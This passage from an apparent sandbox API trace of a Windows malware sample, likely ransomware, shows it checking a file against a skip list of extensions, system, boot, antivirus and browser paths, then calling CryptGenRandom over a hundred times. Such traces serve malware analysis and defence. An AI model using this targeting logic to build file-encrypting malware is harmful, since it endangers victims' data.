(pszFile="Memo.emf", pszSpec="*.dll") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.lnk") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.bat") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.ini") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.msi") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.scf") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*pagefile.sys*") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*NTUSER.DAT*") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*AppData*") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\winrar\\*") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\java\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\windows\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\ESET\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\AVG\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\AVIRA\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*Atheros*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*Realtek*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*bootmgr*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*boot*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*boot*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*CONFIG.SYS*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*IO.SYS*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*MSDOS.SYS*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*NTDETECT.COM*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*ntldr*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*chrome*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*opera*") returned 0 [0163.863] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*firefox*") returned 0 [0163.863] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf", pszSpec="*") returned 1 [0163.863] strlen (_Str="NMoreira") returned 0x8 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.863] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.864] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.865] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.866] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: 